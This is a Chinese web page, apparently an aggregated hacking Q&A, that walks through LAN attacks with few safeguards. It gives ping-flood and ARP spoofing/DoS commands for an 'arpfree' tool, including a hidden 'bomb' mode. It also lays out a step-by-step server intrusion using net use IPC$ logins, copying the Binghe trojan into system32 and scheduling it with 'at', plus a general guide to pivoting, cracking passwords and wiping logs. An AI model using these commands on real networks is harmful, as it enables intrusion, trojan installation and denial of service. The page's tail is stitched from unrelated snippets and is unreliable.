一般来说这是ARP局域网攻击,如果你是在公司上班,应该是同事的电脑中毒了.如果是别人故意攻击你的话,你就算下了攻击软件也没用啊.人空会攻,他自然会防.现在下个360ARP基本上就能解决攻击问题了.
目前更流行的攻击方式有两种:
1 ddos
2 dos
之一种就是要用多台高配置电脑(10以上)同时向目标发送合法的垃圾数据包。发送 *** :在dos里运行C:\ping -l 65500 -t 192.168.1.21
Pinging 192.168.1.21 with 65500 bytes of data:
Reply from 192.168.1.21: bytes=65500 time10ms TTL=254
Reply from 192.168.1.21: bytes=65500 time10ms TTL=254
………………
这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包,如果你只有一台计算机也许没有什么效果,但如果有很多计算机那么就可以使对方完全瘫痪,我曾经就做过这样的试验,当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时,不到5分钟对方的 *** 就已经完全瘫痪, *** 严重堵塞,HTTP和FTP服务完全停止,由此可见威力非同小可。
按ctrl+c 会停止
第二种就是用一台电脑不许太高配置,用相应的工具先查看目标的漏洞然后采取攻击,这种 *** 不适合对付有防火墙的和保护措施很好用户。
安装杀毒软件,防火墙,养成良好上网习惯,及时修补系统漏洞都可以有效防御。
教你让内网任何一台电脑死机 的程序:(更好别犯法,否则子自食其果!)
开始忘记说了,要使用ARP欺骗,必须启动ip路由功能,修改(添加)注册表选项:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1
(有的朋友发现打开网卡失败,原因可能就是这个.)
发送的时候可以选择ARP的TYPE。如果是ARP请求报文,则只要输入要问的IP地址
如果是ARP应答报文则要输入发送端的IP以及对方询问MAC地址对应的IP地址
最后的发送速度可选参数为:(大小写敏感..我觉得挺不好的)
fast----------最快
hear---------每60MS一个包(可能是比较适合结合SNIFFER做监听)
slowhear---每500MS一个包
auto---------每1秒一个包
slow---------每2秒个包
使用 *** 如下:
***********************************************************************
* (1)Send arp packet in "request mode" Examples:
* arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast
* | | | | |
* your mac address | | | |
* destnation mac | | speed
* arp type |
* |
* your ip address
***********************************************************************
* (2)Send arp packet in "reply mode" Examples:
* arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto
* | | | | | |
* your mac address | | | | |
* destnation mac | | | speed
* arp type | |
* | |
* your ip address |
* |
* the ip address of destnation mac
***********************************************************************
补充:反击“LAN终结者”的办法:
反击“终结者”有几个办法:
1:发动比他更强烈的攻击:
arpfree 123412341234 ffffffffffff request 192.168.237.58 fast
|
|
这里是你想攻击的人的IP地址
2:交换机竞争:
arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast
|
|
这里是你想攻击的人的MAC地址
1:情况将导致他IP地址冲突(比“终结者”来的猛烈多了)
2:情况将使得他无法连接 *** (由于交换机把他的流量都给你了)
———————————更-----新----消-----息—————————————————————
因为有朋友反映在非交换环境下,如使用HUB的情况下,无法对目标进行打击
故于2006年4月5日更新附件“arpfree.rar”
增加参数“bomb”,使用 *** 如下:
假设,目标为IP:192.168.237.109 目标mac为:011a8575a436
攻击命令如下:
arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb
其实就是进行简单的ARP DOS攻击,快速刷新目标的ARP缓存,可以在消耗自身较少系统资源的情况下
造成和PDOS工具类似的效果,并且如果你不停止攻击,对方重启以后也无法正常进入系统
(当然前提是他没拔网线)。
其实这样做是十分不厚道的....所以参数就没有写在程序的 HELP 里面,大家慎用...
告诉你当黑客
1、
隐藏自已的位置 为了不在目的主机上留下自己的IP地址,防止被目的主机发现,老练的攻击者都会尽 量通过“跳板”或“肉鸡”展开攻击。所谓“肉鸡”通常是指,HACK实现通过后门程序控制 的傀儡主机,通过“肉鸡”开展的扫描及攻击,即便被发现也由于现场遗留环境的IP地址是 “肉鸡”的地址而很难追查。
2、
寻找目标主机并分析目标主机 攻击者首先要寻找目标主机并分析目标主机。在Internet上能真正标识主机的是IP地 址,域名是为了便于记忆主机的IP地址而另起的名字,只要利用域名和IP地址就可以顺利地 找到目标主机。当然,知道了要攻击目标的位置还是远远不够的,还必须将主机的操作系统 类型及其所提供服务等资料作个全面的了解。此时,攻击者们会使用一些扫描器工具,以试 图获取目标主机运行的是哪种操作系统的哪个版本,系统有哪些帐户,开启了哪些服务,以 及服务程序的版本等资料,为入侵作好充分的准备。
3、
获取帐号和密码,登录主机 攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进 行。这样常迫使他们先设法盗窃帐户文件,进行破解,从中获取某用户的帐户和口令,再寻 觅合适时机以此身份进入主机。当然,利用某些工具或系统漏洞登录主机也是攻击者常用的 一种技法。
4、
获得控制权 攻击者们利用各种工具或系统漏洞进入目标主机系统获得控制权之后,就会做两件事 :清除记录和留下后门。他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程 操纵程序,以便日后可以不被觉察地再次进入系统。此外,为了避免目标主机发现,清除日 志、删除拷贝的文件等手段来隐藏自己的踪迹之后,攻击者就开始下一步的行动。
黑客是入侵别人电脑的 *** 有9种。
1、获取口令
这又有三种 *** :
一是通过 *** 监听非法得到用户口令,这类 *** 有一定的局限性,但危害性极大,监听者往往能够获得其所在网段的所有用户账号和口令,对局域网安全威胁巨大;二是在知道用户的账号后(如电子邮件@前面的部分)利用一些专门软件强行破解用户口令,这种 *** 不受网段限制,但黑客要有足够的耐心和时间;三是在获得一个服务器上的用户口令文件(此文件成为Shadow文件)后,用暴力破解程序破解用户口令,该 *** 的使用前提是黑客获得口令的Shadow文件。
此 *** 在所有 *** 中危害更大,因为它不需要像第二种 *** 那样一遍又一遍地尝试登录服务器,而是在本地将加密后的口令与Shadow文件中的口令相比较就能非常容易地破获用户密码,尤其对那些弱智用户(指口令安全系数极低的用户,如某用户账号为zys,其口令就是zys666、666666、或干脆就是zys等)更是在短短的一两分钟内,甚至几十秒内就可以将其干掉。
2、放置特洛伊木马程序
特洛伊木马程序可以直接侵入用户的电脑并进行破坏,它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载,一旦用户打开了这些邮件的附件或者执行了这些程序之后,它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中,并在自己的计算机系统中隐藏一个可以在Windows启动时悄悄执行的程序。
当您连接到因特网上时,这个程序就会通知黑客,来报告您的IP地址以及预先设定的端口。黑客在收到这些信息后,再利用这个潜伏在其中的程序,就可以任意地修改您的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等,从而达到控制你的计算机的目的。
3、WWW的欺骗技术
在网上用户可以利用IE等浏览器进行各种各样的WEB站点的访问,如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在:正在访问的网页已经被黑客篡改过,网页上的信息是虚假的!例如黑客将用户要浏览的网页的URL改写为指向黑客自己的服务器,当用户浏览目标网页的时候,实际上是向黑 *** 务器发出请求,那么黑客就可以达到欺骗的目的了。
4、电子邮件攻击
电子邮件攻击主要表现为两种方式:
一是电子邮件轰炸和电子邮件“滚雪球”,也就是通常所说的邮件炸弹,指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件,致使受害人邮箱被“炸”,严重者可能会给电子邮件服务器操作系统带来危险,甚至瘫痪;
二是电子邮件欺骗,攻击者佯称自己为系统管理员(邮件地址和系统管理员完全相同),给用户发送邮件要求用户修改口令(口令可能为指定字符串)或在貌似正常的附件中加载病毒或其他木马程序(据笔者所知,某些单位的 *** 管理员有定期给用户免费发送防火墙升级程序的义务,这为黑客成功地利用该 *** 提供了可乘之机),这类欺骗只要用户提高警惕,一般危害性不是太大。
5、通过一个节点来攻击其他节点
黑客在突破一台主机后,往往以此主机作为根据地,攻击其他主机(以隐蔽其入侵路径,避免留下蛛丝马迹)。他们可以使用 *** 监听 *** ,尝试攻破同一 *** 内的其他主机;也可以通过IP欺骗和主机信任关系,攻击其他主机。这类攻击很狡猾,但由于某些技术很难掌握,如IP欺骗,因此较少被黑客使用。
6、 *** 监听
*** 监听是主机的一种工作模式,在这种模式下,主机可以接受到本网段在同一条物理通道上传输的所有信息,而不管这些信息的发送方和接受方是谁。此时,如果两台主机进行通信的信息没有加密,只要使用某些 *** 监听工具,例如NetXray for windows 95/98/nt,sniffit for linux 、solaries等就可以轻而易举地截取包括口令和帐号在内的信息资料。虽然 *** 监听获得的用户帐号和口令具有一定的局限性,但监听者往往能够获得其所在网段的所有用户帐号及口令。
7、寻找系统漏洞
许多系统都有这样那样的安全漏洞(Bugs),其中某些是操作系统或应用软件本身具有的,如Sendmail漏洞,win98中的共享目录密码验证漏洞和IE5漏洞等,这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏,除非你将网线拔掉;还有一些漏洞是由于系统管理员配置错误引起的,如在 *** 文件系统中,将目录和文件以可写的方式调出,将未加Shadow的用户密码文件以明码方式存放在某一目录下,这都会给黑客带来可乘之机,应及时加以修正。
8、利用帐号进行攻击
有的黑客会利用操作系统提供的缺省账户和密码进行攻击,例如许多UNIX主机都有FTP和Guest等缺省账户(其密码和账户名同名),有的甚至没有口令。黑客用Unix操作系统提供的命令如Finger和Ruser等收集信息,不断提高自己的攻击能力。这类攻击只要系统管理员提高警惕,将系统提供的缺省账户关掉或提醒无口令用户增加口令一般都能克服。
9、偷取特权
利用各种特洛伊木马程序、后门程序和黑客自己编写的导致缓冲区溢出的程序进行攻击,前者可使黑客非法获得对用户机器的完全控制权,后者可使黑客获得超级用户的权限,从而拥有对整个 *** 的绝对控制权。这种攻击手段,一旦奏效,危害性极大。
其实攻击别人的电脑不是最让人头痛的办法,要是共同的网线,就下载一个P2P终结者软件,控制他的流量,急死他! 下面是如何攻击别人电脑,给你一个网址,你自己可以去学一学,上面有很多 *** 的http://hi.baidu.com/wangyoulian258/blog/item/fe8ce001f05eb3071d95830a.html (一):shed.exe
(二)流光2000
(三)cmd.exe (其实就是2000下的dos啦)!
(四)冰河8.4 操作系统:win2000 server 或者winxp系统。 “shed.exe”:其实就是用来网上查共享资源的,速度快,可以查到很多服务断的共项文件,不过在这里面有些ip在浏览器中无法访问,这是因为其中也包含了个人上网的ip.呵呵!一些作网站,网吧的服务器一些目录都是共享的,有些是可以访问,但是不能删除,因为你所访问的都是以匿名访问的,所以权限不够!有些需要密码。遇到密码怎办?用流光! “流光”虽说对202作了限制,但是对小日本的ip可是没有限制的,呵呵!所以说使用流光的ipc探测,建立一个空对话,查到用户列表,然后先简单探测,此时有些网管懒惰,把administrator设置的过于简单,呵呵,你就可以抓到了。
下一步如何做呢?也许在你查对方的端口时发现对方开的端口很少,比如ftp没开,怎办呢?冰河! “冰河”,想必许多朋友都玩过,使用冰河控制一台服务器速度很快,(因为服务器那边带宽很大)几分钟就可以查到对方主机的主页所在位置。但是如何上传并且控制他呢? “cmd.exe” 是2000下的dos了,执行cmd.exe 使用net命令,
具体操作如下:
之一步:net use \\ip\ipc$ “password” /user:”user” 说明:以一个超级用户名与你想黑的网站建立联接,当然超级用户必须是该网站admin里的。这里的”ip”就是主机了,“password”就是超级用户的密码,“user”就是超级用户。比如:net use \\210.248.250.2\ipc$ “maozhiie” /user:"maozhijie"
第二步:copy g-server.exe \\ip\admin$\system32 说明:g-server.exe就是冰河的远程服务器端。意义:将此文件拷贝到对方的主机winnt里的system32目录里。也许有人要问木马侵入对方那边可以察觉出来的吧,呵呵!装了防火墙估计可以,不过很多主机没钱买呀!不像中国盗版满天飞!如果你有最新的木马也可以的!这是更好的了!!嘿嘿……
第三步:net time \\ip 察看对方的服务器时间。由于有时差,应该是一个小时吧!所以必须要以对方的服务器时间为准。
第四步:at \\ip time g-server.exe 这里的time就是对方的主机时间。作用:在规定时间执行该程序。比如 at \\210.248.250.2 19:55 g-server.exe 第五步:冰河就可以控制该电脑了。这个我就不说了吧,呵呵!菜鸟也会玩的软件。
这时我们就可以控制服务器了,服务器入侵主要靠的是帐号与密码。大家要先明白什么是系统帐号。什么是系统密码!
其它WINDOWS每一个系统都有着他的超级管理员帐号与密码!
一但这些被黑客扫描到的话,哪么你将会得到一个恐怕的威胁!
当你私服是人气高的时候。给黑客入侵的话,哪要是万一给删了数据。到时候。真的是惨不忍堵。
一:了解一下帐号的含义
先运行CMD
然后输入:net user(回车健)
这样后,会显示一例帐号
再查看管理员帐号
输入:net localgroup administrators
这就是查看administrators组的用户。这样的话若是人家用隐藏帐号的 *** 也会查出来!
系统自带的超级管理员帐号是administrator
记住这里显示出来多个帐号不明的帐号。哪就证明你机器不安全了。若出现在的帐号都是你自已的帐号。哪百分之四十你机器未被入侵
帐号安全:
二:密码篇
你若觉得自已的帐号密码是123456哪么不出三秒人家就到你机上一游了。
修改密码 *** ,在DOS下修改更安全
输入net user 帐号名 需修改密码(然后回车健)
一般密码设复杂一点!
黑客常常利用电子邮件系统的漏洞,结合简单的工具就能达到攻击目的。
一同走进黑客的全程攻击,了解电子邮件正在面临的威胁和挑战……
毫无疑问,电子邮件是当今世界上使用最频繁的商务通信工具,据可靠统计显示,目前全球每天的电子邮件发送量已超过500亿条,预计到2008年该数字将增长一倍。
电子邮件的持续升温使之成为那些企图进行破坏的人所日益关注的目标。如今,黑客和病毒撰写者不断开发新的和有创造性的 *** ,以期战胜安全系统中的改进措施。
出自邮件系统的漏洞
典型的互联网通信协议——TCP和UDP,其开放性常常引来黑客的攻击。而IP地址的脆弱性,也给黑客的伪造提供了可能,从而泄露远程服务器的资源信息。
防火墙只控制基于 *** 的连接,通常不对通过标准电子邮件端口(25端口)的通信进行详细审查。
一旦企业选择了某一邮件服务器,它基本上就会一直使用该品牌,因为主要的服务器平台之间不具互操作性。以下分别概述了黑客圈中一些广为人知的漏洞,并阐释了黑客利用这些安全漏洞的方式。
一、IMAP 和 POP 漏洞
密码脆弱是这些协议的常见弱点。各种IMAP和POP服务还容易受到如缓冲区溢出等类型的攻击。
二、拒绝服务(DoS)攻击
1.死亡之Ping——发送一个无效数据片段,该片段始于包结尾之前,但止于包结尾之后。
2.同步攻击——极快地发送TCP SYN包(它会启动连接),使受攻击的机器耗尽系统资源,进而中断合法连接。
3.循环——发送一个带有完全相同的源/目的地址/端口的伪造SYN包,使系统陷入一个试图完成TCP连接的无限循环中。
三、系统配置漏洞
企业系统配置中的漏洞可以分为以下几类:
1.默认配置——大多数系统在交付给客户时都设置了易于使用的默认配置,被黑客盗用变得轻松。
2.空的/默认根密码——许多机器都配置了空的或默认的根/管理员密码,并且其数量多得惊人。
3.漏洞创建——几乎所有程序都可以配置为在不安全模式下运行,这会在系统上留下不必要的漏洞。面说说吧,希望你能从中领略一些道理.
趙本山66位所有徒弟排名名單及照片大合集情之一字謂之生死也是小事,世間文字八千萬,唯有情字最殺人! 第一批(6人): 李正春(已故):2007年因病去世,吉林省梨樹縣人,趙本山先生01號门生。在電...
坐下来一小时,两人啰啰嗦嗦叨,就好几百。心理辅导到底有什么作用? 心态,这个词应用面越来越广。心理辅导也渐渐地被很多人民群众接受。 学校老师有无法沟通交流的学生,会让心理辅导教师去协助沟通交流;...
本文导读目录: 1、网上刷单被骗了8万,有没有什么办法,如果对方人在国外,是不是中国警察就没有办法了 2、黑客入侵手法 3、夺虎连环计高清完整版下载 4、黑客13种入侵手法 5、黑客入...
美国有着丰富多彩的出国留学教学资源,能够填补中国高等职业教育資源的相对性不够。 我国人口非常多,但高校比较有限,不能满足要想成龙大哥的爸爸妈妈和期盼接纳高等职业教育的学员的要求。一般,不计其数的兵士...
所谓女宰相之说,前有陆令萱被称为女相,后有上官婉儿。陆令萱曾被北齐后主高纬封为“女侍中”,但这个“女侍中”仍然是内廷的官职,不同于庙堂上的侍中,只是内廷仪式性的女官,并没有宰相的权力。上官婉儿墓志上说...
找黑客一次多少钱相关问题 黑客截图相关问题 怎么样自学黑客技术 凭手机号定位别人手机位置(怎么定位手机号位置)...